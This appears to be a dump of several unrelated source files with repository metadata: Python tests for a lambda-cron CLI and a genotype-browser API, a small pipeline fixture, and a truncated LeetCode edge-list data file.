"Apache-2.0"
] | 22
|
2017-10-27T11:37:58.000Z
|
2021-11-09T09:35:37.000Z
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
"Apache-2.0"
] | 1
|
2018-03-21T18:31:01.000Z
|
2018-03-21T18:31:01.000Z
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
"Apache-2.0"
] | 3
|
2017-10-27T16:49:42.000Z
|
2018-11-03T04:14:10.000Z
|
# Copyright (C) 2016 MediaMath <http://www.mediamath.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from tests.utils import valid_cong_file_path
from lambda_cron.cli.cli_config import CliConfigParser
from lambda_cron.cli.command.cloudformation import CreateCommand
from argparse import Namespace
@pytest.fixture(scope='module')
def config_parser():
    """Module-scoped parser built from the valid sample config file."""
    config_path = valid_cong_file_path()
    return CliConfigParser(config_path)
class CreateCommandSpy(CreateCommand):
    """Test double for CreateCommand.

    Records every command passed to ``_exec`` instead of executing it,
    and captures the lambda functions config that gets written.
    """

    def __init__(self, *kwargs):
        super().__init__(*kwargs)
        # Commands that would have been executed, in call order.
        self.commands_list = []
        # Last config handed to write_lambda_functions_config.
        self.lambda_function_config = {}

    def _exec(self, command):
        # Record instead of running the external command.
        self.commands_list.append(command)

    def write_lambda_functions_config(self, config):
        # Capture the config, then delegate to the real implementation.
        self.lambda_function_config = config
        super().write_lambda_functions_config(config)
def test_create_command_with_bucket_exists_not_create_bucket(monkeypatch, config_parser):
    """'create' without bucket creation against an existing bucket runs
    four steps: pip packaging, s3 upload, create-stack, and the wait.
    """
    args = Namespace(
        command='create',
        environment='prod',
        aws_profile=None,
        create_bucket=None,
    )
    command = CreateCommandSpy(config_parser.get_config(args.environment), args)
    monkeypatch.setattr(command, 'bucket_exists', lambda: True)

    command.run()

    cmds = command.commands_list
    assert len(cmds) == 4
    # Step 1: packaging via pip, without an AWS profile.
    assert 'pip' in cmds[0]
    assert '--profile' not in cmds[0]
    # Step 2: upload of the bundle to the configured bucket.
    assert 's3' in cmds[1]
    assert 'cp' in cmds[1]
    assert 's3://test-bucket-custom' in cmds[1][4]
    assert '--profile' not in cmds[1]
    # Step 3: CloudFormation create-stack with all template parameters.
    assert 'create-stack' in cmds[2]
    assert 'LambdaCron-prod' in cmds[2]
    assert '--template-body' in cmds[2]
    assert 'file://' in cmds[2][6]
    assert '/lambda-cron/lambda_cron/template.cfn.yml' in cmds[2][6]
    assert 'ParameterKey=Bucket,ParameterValue=test-bucket-custom' in cmds[2]
    assert 'ParameterKey=Environment,ParameterValue=prod' in cmds[2]
    assert 'ParameterKey=State,ParameterValue=ENABLED' in cmds[2]
    assert 'ParameterKey=CronExpression,ParameterValue=cron(*/5 * * * ? *)' in cmds[2]
    assert 'ParameterKey=AlarmEnabled,ParameterValue=True' in cmds[2]
    assert 'ParameterKey=AlarmEmail,ParameterValue=my@email.com' in cmds[2]
    assert 'ParameterKey=AlarmPeriod,ParameterValue=300' in cmds[2]
    assert '--profile' not in cmds[2]
    # Step 4: wait for stack creation to complete.
    assert 'stack-create-complete' in cmds[3]
    assert '--profile' not in cmds[3]
def test_create_command_with_bucket_not_exists_not_create_bucket(monkeypatch, config_parser):
    """'create' must fail when the configured bucket does not exist and
    bucket creation was not requested.
    """
    cli_arguments = Namespace()
    cli_arguments.command = 'create'
    cli_arguments.environment = 'prod'
    cli_arguments.aws_profile = None
    cli_arguments.create_bucket = None
    create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)

    def bucket_exists():
        return False
    monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)

    with pytest.raises(RuntimeError) as ex_info:
        create_command.run()
    # Fix: check the exception object itself. On pytest >= 5,
    # str(ex_info) returns the ExceptionInfo location/repr, not the
    # exception message, so the original assertion could fail spuriously.
    assert "Bucket 'test-bucket-custom' does not exist" in str(ex_info.value)
def test_create_command_with_bucket_exists_create_bucket(monkeypatch, config_parser):
    """Requesting bucket creation when the bucket already exists must
    raise instead of overwriting it.
    """
    cli_arguments = Namespace()
    cli_arguments.command = 'create'
    cli_arguments.environment = 'prod'
    cli_arguments.aws_profile = None
    cli_arguments.create_bucket = True
    create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)

    def bucket_exists():
        return True
    monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)

    with pytest.raises(RuntimeError) as ex_info:
        create_command.run()
    # Fix: check the exception object itself. On pytest >= 5,
    # str(ex_info) returns the ExceptionInfo location/repr, not the
    # exception message, so the original assertion could fail spuriously.
    assert "Bucket 'test-bucket-custom' already exists" in str(ex_info.value)
def test_create_command_with_bucket_not_exists_create_bucket(monkeypatch, config_parser):
    """'create' with bucket creation requested runs five steps: bucket
    creation (s3 mb), pip packaging, s3 upload, create-stack, wait.
    """
    args = Namespace(
        command='create',
        environment='prod',
        aws_profile=None,
        create_bucket=True,
    )
    command = CreateCommandSpy(config_parser.get_config(args.environment), args)
    monkeypatch.setattr(command, 'bucket_exists', lambda: False)

    command.run()

    cmds = command.commands_list
    assert len(cmds) == 5
    # Step 1: create the bucket first.
    assert {'aws', 's3', 'mb'} <= set(cmds[0])
    # Step 2: packaging via pip, without an AWS profile.
    assert 'pip' in cmds[1]
    assert '--profile' not in cmds[1]
    # Step 3: upload of the bundle to the freshly created bucket.
    assert 's3' in cmds[2]
    assert 'cp' in cmds[2]
    assert 's3://test-bucket-custom' in cmds[2][4]
    assert '--profile' not in cmds[2]
    # Step 4: CloudFormation create-stack with all template parameters.
    assert 'create-stack' in cmds[3]
    assert 'LambdaCron-prod' in cmds[3]
    assert '--template-body' in cmds[3]
    assert 'file://' in cmds[3][6]
    assert '/lambda-cron/lambda_cron/template.cfn.yml' in cmds[3][6]
    assert 'ParameterKey=Bucket,ParameterValue=test-bucket-custom' in cmds[3]
    assert 'ParameterKey=Environment,ParameterValue=prod' in cmds[3]
    assert 'ParameterKey=State,ParameterValue=ENABLED' in cmds[3]
    assert 'ParameterKey=CronExpression,ParameterValue=cron(*/5 * * * ? *)' in cmds[3]
    assert 'ParameterKey=AlarmEnabled,ParameterValue=True' in cmds[3]
    assert 'ParameterKey=AlarmEmail,ParameterValue=my@email.com' in cmds[3]
    assert 'ParameterKey=AlarmPeriod,ParameterValue=300' in cmds[3]
    assert '--profile' not in cmds[3]
    # Step 5: wait for stack creation to complete.
    assert 'stack-create-complete' in cmds[4]
    assert '--profile' not in cmds[4]
def test_create_command_with_profile(monkeypatch, config_parser):
    """With an AWS profile configured, the aws CLI steps (indices 0, 2,
    3, 4) carry '--profile test-profile'; the pip step (index 1) does not.
    """
    args = Namespace(
        command='create',
        environment='prod',
        aws_profile='test-profile',
        create_bucket=True,
    )
    command = CreateCommandSpy(config_parser.get_config(args.environment), args)
    monkeypatch.setattr(command, 'bucket_exists', lambda: False)

    command.run()

    cmds = command.commands_list
    # The pip packaging step never receives the AWS profile.
    assert '--profile' not in cmds[1]
    # Every aws CLI step does.
    for index in (0, 2, 3, 4):
        assert '--profile' in cmds[index]
        assert 'test-profile' in cmds[index]
| 45.829545
| 110
| 0.768411
| 1,059
| 8,066
| 5.596789
| 0.147309
| 0.162308
| 0.191328
| 0.227771
| 0.832293
| 0.828244
| 0.810866
| 0.776784
| 0.658512
| 0.638434
| 0
| 0.01163
| 0.136499
| 8,066
| 175
| 111
| 46.091429
| 0.83934
| 0.071039
| 0
| 0.449612
| 0
| 0
| 0.180372
| 0.110443
| 0
| 0
| 0
| 0
| 0.418605
| 1
| 0.108527
| false
| 0
| 0.03876
| 0.046512
| 0.20155
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6f412bff8273727f5753e46ab5d946f34ea9833
| 263
|
py
|
Python
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 6
|
2020-04-01T12:06:20.000Z
|
2021-11-02T19:10:27.000Z
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 26
|
2019-12-08T12:25:39.000Z
|
2022-02-28T07:24:56.000Z
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 8
|
2020-06-19T15:49:46.000Z
|
2021-07-06T10:15:37.000Z
|
def configure(context):
    """Register two aliased instances of the chain_c stage, each with a
    different 'a' parameter."""
    for alias, value in (("s1", 5), ("s2", 10)):
        context.stage(
            "tests.fixtures.downstream.chain_c", {"a": value}, alias=alias)
def execute(context):
    """Combine the results of the two aliased upstream stages."""
    first = context.stage("s1")
    second = context.stage("s2")
    return first + second
| 37.571429
| 81
| 0.657795
| 35
| 263
| 4.885714
| 0.485714
| 0.280702
| 0.19883
| 0.292398
| 0.491228
| 0.491228
| 0.491228
| 0.491228
| 0
| 0
| 0
| 0.030973
| 0.140684
| 263
| 6
| 82
| 43.833333
| 0.725664
| 0
| 0
| 0
| 0
| 0
| 0.288973
| 0.250951
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d60f1f4f78c3eb4e352de1e7502a0aaddc3a0d2b
| 8,735
|
py
|
Python
|
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
import copy
import json
import pytest
from datasets_api.permissions import add_group_perm_to_user, \
add_group_perm_to_dataset
from rest_framework import status
# Apply these fixtures to every test in this module (pytest `usefixtures`):
# a wdae GPF instance and precomputed gene sets.
pytestmark = pytest.mark.usefixtures(
    "wdae_gpf_instance", "dae_calc_gene_sets")
# Minimal valid query body; tests copy and extend it as needed.
EXAMPLE_REQUEST_F1 = {
    "datasetId": "quads_f1",
}
# Genotype-browser query endpoint exercised by every test below.
QUERY_VARIANTS_URL = "/api/v3/genotype_browser/query"
def test_simple_query(db, admin_client, preview_sources):
    """A basic preview query over quads_f1 returns three variants."""
    payload = dict(EXAMPLE_REQUEST_F1, sources=list(preview_sources))
    response = admin_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    body = b"".join(response.streaming_content).decode("utf-8")
    assert len(json.loads(body)) == 3
def test_simple_query_download(db, admin_client, download_sources):
    """Download returns tab-separated rows; the header line lists the
    expected download columns."""
    query = dict(EXAMPLE_REQUEST_F1)
    query["download"] = True
    query["sources"] = download_sources
    payload = {"queryData": json.dumps(query)}

    response = admin_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK

    rows = list(response.streaming_content)
    assert rows
    assert rows[0]
    assert len(rows) == 4
    # First streamed row is the header: tab-separated, trailing newline.
    header = rows[0].decode("utf-8")[:-1].split("\t")
    assert set(header) == {
        "family id",
        "studyName",
        "phenotype",
        "location",
        "variant",
        "bestSt",
        "fromParentS",
        "inChS",
        "worstEffect",
        "genes",
        "counts",
        "geneEffect",
        "effectDetails",
        "LGD_rank",
        "RVIS_rank",
        "pLI_rank",
        "SSC-freq",
        "EVS-freq",
        "E65-freq",
        "instrument1.categorical",
        "instrument1.continuous",
        "instrument1.ordinal",
        "instrument1.raw",
    }
def test_simple_query_summary_variants(
    db, admin_client, summary_preview_sources
):
    """Summary-variant preview over quads_f1 returns three variants."""
    payload = {**EXAMPLE_REQUEST_F1,
               "sources": list(summary_preview_sources)}
    response = admin_client.post(
        QUERY_VARIANTS_URL,
        json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    body = b"".join(response.streaming_content).decode("utf-8")
    assert len(json.loads(body)) == 3
def test_simple_query_summary_variants_download(
    db, admin_client, summary_download_sources
):
    """Summary download returns tab-separated rows; its header carries
    only the summary columns (no family/genotype columns)."""
    query = dict(EXAMPLE_REQUEST_F1)
    query["download"] = True
    query["sources"] = summary_download_sources
    payload = {"queryData": json.dumps(query)}

    response = admin_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK

    rows = list(response.streaming_content)
    assert rows
    assert rows[0]
    assert len(rows) == 4
    # First streamed row is the header: tab-separated, trailing newline.
    header = rows[0].decode("utf-8")[:-1].split("\t")
    assert set(header) == {
        "location",
        "variant",
        "worstEffect",
        "genes",
        "geneEffect",
        "effectDetails",
        "LGD_rank",
        "RVIS_rank",
        "pLI_rank",
        "SSC-freq",
        "EVS-freq",
        "E65-freq",
        "instrument1.categorical",
        "instrument1.continuous",
        "instrument1.ordinal",
        "instrument1.raw",
    }
@pytest.mark.parametrize("url", [QUERY_VARIANTS_URL])
def test_missing_dataset(db, user_client, url, preview_sources):
    """A query without 'datasetId' must be rejected with 400 Bad Request."""
    data = copy.deepcopy(EXAMPLE_REQUEST_F1)
    data['sources'] = list(preview_sources)
    del data["datasetId"]
    response = user_client.post(
        url, json.dumps(data), content_type="application/json"
    )
    # Fix: the original `assert status.HTTP_400_BAD_REQUEST, response.status_code`
    # asserted a truthy constant (400) and never checked the response at all.
    assert response.status_code == status.HTTP_400_BAD_REQUEST
@pytest.mark.parametrize("url", [QUERY_VARIANTS_URL])
def test_bad_dataset(db, user_client, url, preview_sources):
    """A query naming a nonexistent dataset must be rejected with 400."""
    data = copy.deepcopy(EXAMPLE_REQUEST_F1)
    data['sources'] = list(preview_sources)
    data["datasetId"] = "ala bala portokala"
    response = user_client.post(
        url, json.dumps(data), content_type="application/json"
    )
    # Fix: the original `assert status.HTTP_400_BAD_REQUEST, response.status_code`
    # asserted a truthy constant (400) and never checked the response at all.
    assert response.status_code == status.HTTP_400_BAD_REQUEST
# START: Adaptive datasets rights
def test_normal_dataset_rights_query(db, user, user_client, preview_sources):
    """Granting the 'composite_dataset_ds' group to the user yields all
    17 variants of the composite dataset."""
    payload = {
        "datasetId": "composite_dataset_ds",
        "sources": list(preview_sources),
    }
    add_group_perm_to_user("composite_dataset_ds", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    variants = json.loads(
        b"".join(response.streaming_content).decode("utf-8"))
    assert len(variants) == 17
def test_mixed_dataset_rights_query(db, user, user_client, preview_sources):
    """Granting only the 'inheritance_trio' group yields the 14 variants
    reachable through that study."""
    payload = {
        "datasetId": "composite_dataset_ds",
        "sources": list(preview_sources),
    }
    add_group_perm_to_user("inheritance_trio", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    variants = json.loads(
        b"".join(response.streaming_content).decode("utf-8"))
    assert len(variants) == 14
def test_mixed_layered_dataset_rights_query(
    db, user, user_client, preview_sources
):
    """Granting both 'inheritance_trio' and 'composite_dataset_ds' groups
    yields all 17 variants."""
    payload = {
        "datasetId": "composite_dataset_ds",
        "sources": list(preview_sources),
    }
    add_group_perm_to_user("inheritance_trio", user)
    add_group_perm_to_user("composite_dataset_ds", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    variants = json.loads(
        b"".join(response.streaming_content).decode("utf-8"))
    assert len(variants) == 17
def test_mixed_layered_diff_group_dataset_rights_query(
    db, user, user_client, preview_sources
):
    """A custom group attached to both datasets and to the user yields
    all 17 variants."""
    payload = {
        "datasetId": "composite_dataset_ds",
        "sources": list(preview_sources),
    }
    add_group_perm_to_dataset("new_custom_group", "composite_dataset_ds")
    add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
    add_group_perm_to_user("new_custom_group", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    variants = json.loads(
        b"".join(response.streaming_content).decode("utf-8"))
    assert len(variants) == 17
def test_mixed_dataset_rights_download(
    db, user, user_client, download_sources
):
    """Download with a custom group attached only to 'inheritance_trio'
    streams 15 rows."""
    query = {
        "datasetId": "composite_dataset_ds",
        "sources": list(download_sources),
        "download": True,
    }
    payload = {"queryData": json.dumps(query)}
    add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
    add_group_perm_to_user("new_custom_group", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    rows = list(response.streaming_content)
    assert len(rows) == 15
def test_mixed_dataset_rights_third_party_group(
    db, user, user_client, preview_sources
):
    """A custom group attached only to 'inheritance_trio' yields the 14
    variants reachable through that study."""
    payload = {
        "datasetId": "composite_dataset_ds",
        "sources": list(preview_sources),
    }
    add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
    add_group_perm_to_user("new_custom_group", user)

    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(payload),
        content_type="application/json"
    )
    assert response.status_code == status.HTTP_200_OK
    variants = json.loads(
        b"".join(response.streaming_content).decode("utf-8"))
    assert len(variants) == 14
def test_mixed_dataset_rights_with_study_filters(
    db, user, user_client, preview_sources
):
    """Query a composite dataset with a study filter ("quads_f1") while the
    user's group only has rights on the "inheritance_trio" member dataset.

    The filtered study is outside the permitted dataset, so the query must
    return no variants.
    """
    data = {
        "datasetId": "composite_dataset_ds",
        "studyFilters": [{"studyId": "quads_f1"}],
        "sources": list(preview_sources),
    }
    add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
    add_group_perm_to_user("new_custom_group", user)
    response = user_client.post(
        QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
    )
    assert status.HTTP_200_OK == response.status_code
    res = response.streaming_content
    # Reassemble the streamed UTF-8 JSON body before parsing.
    res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
    # Fixed: removed a leftover debug print(res) that polluted test output.
    assert len(res) == 0
# END: Adaptive datasets rights
| 27.730159
| 77
| 0.663652
| 1,067
| 8,735
| 5.117151
| 0.134021
| 0.051282
| 0.032967
| 0.038462
| 0.863919
| 0.849817
| 0.834066
| 0.825092
| 0.825092
| 0.807875
| 0
| 0.013711
| 0.215112
| 8,735
| 314
| 78
| 27.818471
| 0.782672
| 0.006983
| 0
| 0.70082
| 0
| 0
| 0.170338
| 0.013839
| 0
| 0
| 0
| 0
| 0.122951
| 1
| 0.053279
| false
| 0
| 0.020492
| 0
| 0.07377
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6173c9d2e431150263aeeed5ef3087de9d5310a
| 145,641
|
py
|
Python
|
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
data = [
(5000,
[[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[6,7],[7,8],[8,9],[9,10],[10,11],[11,12],[12,13],[13,14],[14,15],[15,16],[16,17],[17,18],[18,19],[19,20],[20,21],[21,22],[22,23],[23,24],[24,25],[25,26],[26,27],[27,28],[28,29],[29,30],[30,31],[31,32],[32,33],[33,34],[34,35],[35,36],[36,37],[37,38],[38,39],[39,40],[40,41],[41,42],[42,43],[43,44],[44,45],[45,46],[46,47],[47,48],[48,49],[49,50],[50,51],[51,52],[52,53],[53,54],[54,55],[55,56],[56,57],[57,58],[58,59],[59,60],[60,61],[61,62],[62,63],[63,64],[64,65],[65,66],[66,67],[67,68],[68,69],[69,70],[70,71],[71,72],[72,73],[73,74],[74,75],[75,76],[76,77],[77,78],[78,79],[79,80],[80,81],[81,82],[82,83],[83,84],[84,85],[85,86],[86,87],[87,88],[88,89],[89,90],[90,91],[91,92],[92,93],[93,94],[94,95],[95,96],[96,97],[97,98],[98,99],[99,100],[100,101],[101,102],[102,103],[103,104],[104,105],[105,106],[106,107],[107,108],[108,109],[109,110],[110,111],[111,112],[112,113],[113,114],[114,115],[115,116],[116,117],[117,118],[118,119],[119,120],[120,121],[121,122],[122,123],[123,124],[124,125],[125,126],[126,127],[127,128],[128,129],[129,130],[130,131],[131,132],[132,133],[133,134],[134,135],[135,136],[136,137],[137,138],[138,139],[139,140],[140,141],[141,142],[142,143],[143,144],[144,145],[145,146],[146,147],[147,148],[148,149],[149,150],[150,151],[151,152],[152,153],[153,154],[154,155],[155,156],[156,157],[157,158],[158,159],[159,160],[160,161],[161,162],[162,163],[163,164],[164,165],[165,166],[166,167],[167,168],[168,169],[169,170],[170,171],[171,172],[172,173],[173,174],[174,175],[175,176],[176,177],[177,178],[178,179],[179,180],[180,181],[181,182],[182,183],[183,184],[184,185],[185,186],[186,187],[187,188],[188,189],[189,190],[190,191],[191,192],[192,193],[193,194],[194,195],[195,196],[196,197],[197,198],[198,199],[199,200],[200,201],[201,202],[202,203],[203,204],[204,205],[205,206],[206,207],[207,208],[208,209],[209,210],[210,211],[211,212],[212,213],[213,214],[214,215],[215,216],[216,217],[217,218],[218,219],[219,220],[220,221],[221,22
2],[222,223],[223,224],[224,225],[225,226],[226,227],[227,228],[228,229],[229,230],[230,231],[231,232],[232,233],[233,234],[234,235],[235,236],[236,237],[237,238],[238,239],[239,240],[240,241],[241,242],[242,243],[243,244],[244,245],[245,246],[246,247],[247,248],[248,249],[249,250],[250,251],[251,252],[252,253],[253,254],[254,255],[255,256],[256,257],[257,258],[258,259],[259,260],[260,261],[261,262],[262,263],[263,264],[264,265],[265,266],[266,267],[267,268],[268,269],[269,270],[270,271],[271,272],[272,273],[273,274],[274,275],[275,276],[276,277],[277,278],[278,279],[279,280],[280,281],[281,282],[282,283],[283,284],[284,285],[285,286],[286,287],[287,288],[288,289],[289,290],[290,291],[291,292],[292,293],[293,294],[294,295],[295,296],[296,297],[297,298],[298,299],[299,300],[300,301],[301,302],[302,303],[303,304],[304,305],[305,306],[306,307],[307,308],[308,309],[309,310],[310,311],[311,312],[312,313],[313,314],[314,315],[315,316],[316,317],[317,318],[318,319],[319,320],[320,321],[321,322],[322,323],[323,324],[324,325],[325,326],[326,327],[327,328],[328,329],[329,330],[330,331],[331,332],[332,333],[333,334],[334,335],[335,336],[336,337],[337,338],[338,339],[339,340],[340,341],[341,342],[342,343],[343,344],[344,345],[345,346],[346,347],[347,348],[348,349],[349,350],[350,351],[351,352],[352,353],[353,354],[354,355],[355,356],[356,357],[357,358],[358,359],[359,360],[360,361],[361,362],[362,363],[363,364],[364,365],[365,366],[366,367],[367,368],[368,369],[369,370],[370,371],[371,372],[372,373],[373,374],[374,375],[375,376],[376,377],[377,378],[378,379],[379,380],[380,381],[381,382],[382,383],[383,384],[384,385],[385,386],[386,387],[387,388],[388,389],[389,390],[390,391],[391,392],[392,393],[393,394],[394,395],[395,396],[396,397],[397,398],[398,399],[399,400],[400,401],[401,402],[402,403],[403,404],[404,405],[405,406],[406,407],[407,408],[408,409],[409,410],[410,411],[411,412],[412,413],[413,414],[414,415],[415,416],[416,417],[417,418],[418,419],[419,420],[420,421],[421,42
2],[422,423],[423,424],[424,425],[425,426],[426,427],[427,428],[428,429],[429,430],[430,431],[431,432],[432,433],[433,434],[434,435],[435,436],[436,437],[437,438],[438,439],[439,440],[440,441],[441,442],[442,443],[443,444],[444,445],[445,446],[446,447],[447,448],[448,449],[449,450],[450,451],[451,452],[452,453],[453,454],[454,455],[455,456],[456,457],[457,458],[458,459],[459,460],[460,461],[461,462],[462,463],[463,464],[464,465],[465,466],[466,467],[467,468],[468,469],[469,470],[470,471],[471,472],[472,473],[473,474],[474,475],[475,476],[476,477],[477,478],[478,479],[479,480],[480,481],[481,482],[482,483],[483,484],[484,485],[485,486],[486,487],[487,488],[488,489],[489,490],[490,491],[491,492],[492,493],[493,494],[494,495],[495,496],[496,497],[497,498],[498,499],[499,500],[500,501],[501,502],[502,503],[503,504],[504,505],[505,506],[506,507],[507,508],[508,509],[509,510],[510,511],[511,512],[512,513],[513,514],[514,515],[515,516],[516,517],[517,518],[518,519],[519,520],[520,521],[521,522],[522,523],[523,524],[524,525],[525,526],[526,527],[527,528],[528,529],[529,530],[530,531],[531,532],[532,533],[533,534],[534,535],[535,536],[536,537],[537,538],[538,539],[539,540],[540,541],[541,542],[542,543],[543,544],[544,545],[545,546],[546,547],[547,548],[548,549],[549,550],[550,551],[551,552],[552,553],[553,554],[554,555],[555,556],[556,557],[557,558],[558,559],[559,560],[560,561],[561,562],[562,563],[563,564],[564,565],[565,566],[566,567],[567,568],[568,569],[569,570],[570,571],[571,572],[572,573],[573,574],[574,575],[575,576],[576,577],[577,578],[578,579],[579,580],[580,581],[581,582],[582,583],[583,584],[584,585],[585,586],[586,587],[587,588],[588,589],[589,590],[590,591],[591,592],[592,593],[593,594],[594,595],[595,596],[596,597],[597,598],[598,599],[599,600],[600,601],[601,602],[602,603],[603,604],[604,605],[605,606],[606,607],[607,608],[608,609],[609,610],[610,611],[611,612],[612,613],[613,614],[614,615],[615,616],[616,617],[617,618],[618,619],[619,620],[620,621],[621,62
2],[622,623],[623,624],[624,625],[625,626],[626,627],[627,628],[628,629],[629,630],[630,631],[631,632],[632,633],[633,634],[634,635],[635,636],[636,637],[637,638],[638,639],[639,640],[640,641],[641,642],[642,643],[643,644],[644,645],[645,646],[646,647],[647,648],[648,649],[649,650],[650,651],[651,652],[652,653],[653,654],[654,655],[655,656],[656,657],[657,658],[658,659],[659,660],[660,661],[661,662],[662,663],[663,664],[664,665],[665,666],[666,667],[667,668],[668,669],[669,670],[670,671],[671,672],[672,673],[673,674],[674,675],[675,676],[676,677],[677,678],[678,679],[679,680],[680,681],[681,682],[682,683],[683,684],[684,685],[685,686],[686,687],[687,688],[688,689],[689,690],[690,691],[691,692],[692,693],[693,694],[694,695],[695,696],[696,697],[697,698],[698,699],[699,700],[700,701],[701,702],[702,703],[703,704],[704,705],[705,706],[706,707],[707,708],[708,709],[709,710],[710,711],[711,712],[712,713],[713,714],[714,715],[715,716],[716,717],[717,718],[718,719],[719,720],[720,721],[721,722],[722,723],[723,724],[724,725],[725,726],[726,727],[727,728],[728,729],[729,730],[730,731],[731,732],[732,733],[733,734],[734,735],[735,736],[736,737],[737,738],[738,739],[739,740],[740,741],[741,742],[742,743],[743,744],[744,745],[745,746],[746,747],[747,748],[748,749],[749,750],[750,751],[751,752],[752,753],[753,754],[754,755],[755,756],[756,757],[757,758],[758,759],[759,760],[760,761],[761,762],[762,763],[763,764],[764,765],[765,766],[766,767],[767,768],[768,769],[769,770],[770,771],[771,772],[772,773],[773,774],[774,775],[775,776],[776,777],[777,778],[778,779],[779,780],[780,781],[781,782],[782,783],[783,784],[784,785],[785,786],[786,787],[787,788],[788,789],[789,790],[790,791],[791,792],[792,793],[793,794],[794,795],[795,796],[796,797],[797,798],[798,799],[799,800],[800,801],[801,802],[802,803],[803,804],[804,805],[805,806],[806,807],[807,808],[808,809],[809,810],[810,811],[811,812],[812,813],[813,814],[814,815],[815,816],[816,817],[817,818],[818,819],[819,820],[820,821],[821,82
